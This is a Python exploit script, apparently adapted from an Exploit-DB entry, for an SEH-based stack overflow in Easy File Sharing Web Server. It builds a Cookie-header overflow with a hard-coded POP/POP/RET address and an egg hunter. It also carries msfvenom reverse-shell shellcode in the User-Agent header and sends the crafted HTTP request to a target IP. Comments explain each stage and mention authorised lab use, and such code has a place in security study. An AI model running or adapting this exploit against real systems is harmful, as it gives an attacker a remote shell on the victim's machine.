###############################
# MADE BY: SARTHAK SAINI
# EXPLOIT: https://www.exploit-db.com/exploits/42261 -- the published exploit did not work for me, so I wrote my own variant
# VULN SOFTWARE: Easy File Sharing Web Server (SEH-based stack overflow, 32-bit target)
# DOWNLOAD LINK: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
# REFERENCE: https://www.youtube.com/watch?v=Znrvsf8Trvg
# NOTE: the SEH gadget address and the embedded reverse-shell bytes are specific to the lab setup above; re-verify both before use, and only against systems you are authorised to test.
###################################
# SOURCE CODE:
- import socket
- import os
- import time
- import struct
- import sys
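# Target address and port. The value below is a private-range lab VM (not
# localhost, as an earlier comment claimed); edit it for the host you are
# authorised to test.
host = "192.168.42.205"
port = 80

# Total length of the Cookie-header buffer (first stage). The crash offset was
# established at this length; keep it unless you re-verify the overflow.
limit = 3000

# --- First stage: SEH overwrite (32-bit process only) ---------------------
# nSEH: "jmp short +0x14" (EB 14) plus two NOPs. 0x14 = 20 bytes forward, which
# hops over the SEH record and the first NOP sled into the egg hunter below.
nseh = "\xeb\x14\x90\x90"

# SEH handler: hard-coded address of a POP/POP/RET gadget, 0x10018605 written
# little-endian. This is build-specific and must live in a module that is
# neither ASLR- nor SafeSEH-protected; presumably one of the server's own DLLs,
# but the source does not say which -- re-verify (e.g. "!mona seh") against the
# exact version you are testing.
seh = "\x05\x86\x01\x10"
nops = "\x90" * 30

# Egg hunter: the well-known 32-byte NtAccessCheckAndAuditAlarm hunter
# (int 0x2e, eax = 2). It probes memory with the syscall, skips to the next
# page on STATUS_ACCESS_VIOLATION (cmp al, 5), compares each dword against
# "w00t" twice (scasd x2) and jumps to the bytes that follow the egg.
# NOTE(review): int 0x2e and syscall number 2 are 32-bit-Windows specifics that
# vary between Windows versions -- confirm on the target OS.
hunter = (
    "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Egg marker the hunter searches for: "w00t" repeated twice.
egg = "w00tw00t"

# --- Second stage: reverse shell -----------------------------------------
# Generated with:
#   msfvenom -p windows/shell_reverse_tcp lhost=127.0.0.1 lport=1234 -f py --smallest -b '\x00'
# The listener address/port are baked into these bytes: changing `host` above
# does NOT change where the shell calls back. Regenerate for your own listener
# and paste the new bytes here. Only \x00 was excluded as a bad character; the
# encoded output still contains \x0d (CR). If the target's header parser treats
# a lone CR as a line terminator the second stage is truncated, so consider
# regenerating with -b '\x00\x0a\x0d'.
buf = ""
buf += "\x33\xc9\x66\xb9\x43\x01\xe8\xff\xff\xff\xff\xc1\x5e"
buf += "\x30\x4c\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05\x06\x67"
buf += "\x81\xec\x3b\xcb\x68\x86\x5e\x3f\x9b\x43\x1e\x98\x46"
buf += "\x01\x9d\x65\x30\x16\xad\x51\x3a\x2c\xe1\xb3\x1c\x40"
buf += "\x5e\x21\x08\x05\xe7\xe8\x25\x28\xed\xc9\xde\x7f\x79"
buf += "\xa4\x62\x21\xb9\x79\x08\xbe\x7a\x26\x40\xda\x72\x3a"
buf += "\xed\x6c\xb5\x66\x60\x40\x91\xc8\x0d\x5d\xa5\x7d\x01"
buf += "\xc2\x7e\xc0\x4d\x9b\x7f\xb0\xfc\x90\x9d\x5e\x55\x92"
buf += "\x6e\xb7\x2d\xaf\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a"
buf += "\xe8\x3c\x41\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e"
buf += "\xa3\xfa\x76\xf8\x75\xa5\xff\x33\x5c\x5d\x21\x20\x1d"
buf += "\x24\x24\x2e\x7f\x61\xdd\xdc\xde\x0e\x94\x6c\x05\xd4"
buf += "\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0\xcc\xc0\xfd\xda"
buf += "\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88\x66\xf7"
buf += "\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xfc\xfd\xfe\xff\xf0"
buf += "\xe1\xf2\xe3\xdc\x5f\xb9\x68\x58\x46\x6f\x2c\xd6\xb8"
buf += "\xd6\xc0\xc0\xc1\xc3\xab\xc6\xc5\xc2\x15\x41\x2f\xa0"
buf += "\xdb\x9a\x9a\xa6\x56\x75\xa5\xb3\x2c\x01\x50\x16\xa3"
buf += "\xd4\x26\x94\xd3\xa9\x31\xb6\x2f\x55\x43\xb4\x1c\x31"
buf += "\x8d\x85\x8a\x8c\xe9\x63\x08\xbb\xba\xb9\xde\x06\x9b"
buf += "\xe0\xaa\xa2\x17\x0b\x91\x3f\xbd\xde\xc7\xfd\xfc\x73"
buf += "\xbb\x24\x11\xc4\x03\x40\x51\x56\x51\x5e\x5f\x4c\x5d"
buf += "\x42\x5b\x58\x5c\x46\x79\x6b\xdf\x2b\x93\xe9\xc2\x91"
buf += "\xf9\x54\x4d\x5a\xe2\x2e\x77\x28\xa6\x3f\x43\xdb\xf0"
buf += "\x9d\xd7\x9d\x8b\x7c\x43\x8a\xb8\x93\xb2\xcf\xe4\x0e"
buf += "\x35\x48\x3f\xb6\xcc\xd8\x4c\x3f\x80\x7b\x2e\x4c\x50"
buf += "\x2a\x41\x11\xbc\x91"

# Second stage as delivered in the User-Agent header: egg, NOP sled, shell.
# The hunter lands on the first byte after the egg, i.e. inside the sled.
buff = egg + nops + buf

# First stage as delivered in the Cookie header. Layout:
#   "/.:/"  -- the author's prefix; presumably needed to reach the vulnerable
#              cookie-parsing path, the source does not explain it
#   53 x "A" -- filler up to the SEH record (offset 57)
#   nSEH, SEH, NOP sled, egg hunter, NOP sled, "D" padding to `limit`
tests = "/.:/"
tests += "A" * 53
tests += nseh
tests += seh
tests += nops
tests += hunter
tests += nops
if len(tests) > limit:
    # The original silently emitted no padding here (negative repeat count),
    # which would change the crash offset without warning.
    raise ValueError("first-stage buffer exceeds limit of %d bytes" % limit)
tests += "D" * (limit - len(tests))


def build_request(target, user_agent, cookie_buffer):
    """Return the raw HTTP GET that carries both payload stages.

    Args:
        target: host name or IP placed in the Host and Referer headers.
        user_agent: second-stage payload (egg + shell); goes in User-Agent.
            The missing space after "User-Agent:" is kept exactly as the
            original author sent it.
        cookie_buffer: first-stage payload (SEH overwrite); embedded in the
            UserID=PassWD= cookie value.

    Returns:
        The request line and headers, each terminated by CRLF. The caller
        appends the blank line that ends the header block.
    """
    lines = [
        "GET /vfolder.ghp HTTP/1.1",
        "Host: " + target,
        "User-Agent:" + user_agent,
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate",
        "Referer: http://" + target + "/",
        "Cookie: SESSIONID=16246; UserID=PassWD=" + cookie_buffer
        + "; frmUserName=; frmUserPass=; rememberPass=pass",
        "Connection: keep-alive",
        "If-Modified-Since: Mon, 19 Jun 2017 17:36:03 GMT",
    ]
    return "\r\n".join(lines) + "\r\n"


request = build_request(host, buff, tests)


def main(target=host, target_port=port, payload=request, timeout=None):
    """Connect to the target and send the crafted request once.

    Args:
        target: host to connect to (defaults to the module-level `host`).
        target_port: TCP port (defaults to the module-level `port`).
        payload: request text to send; the terminating blank line is added
            here, as in the original (the extra CRLF is harmless).
        timeout: optional socket timeout in seconds; None blocks indefinitely,
            matching the original behaviour.

    Exits with status 1 if the connection fails (the original exited 0 and
    hid the reason behind a bare except). The socket is always closed.
    """
    data = payload + "\r\n\r\n"
    if not isinstance(data, bytes):
        # Python 3: map each code point 0x00-0xFF to exactly one byte so the
        # shellcode goes out unchanged. On Python 2 `str` is already bytes.
        data = data.encode("latin-1")

    print("[*] Connecting to target: " + target)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if timeout is not None:
        sock.settimeout(timeout)
    try:
        try:
            sock.connect((target, target_port))
        except socket.error as exc:
            print("[!] " + target + " didn't respond... (" + str(exc) + ")\n")
            sys.exit(1)
        print("[*] Successfully connected to: " + target)
        print("[*] Sending payload to target...")
        # sendall() retries until every byte is written; send() may stop short.
        sock.sendall(data)
        print("[!] Payload has been sent!\n")
    finally:
        sock.close()


if __name__ == "__main__":
    main()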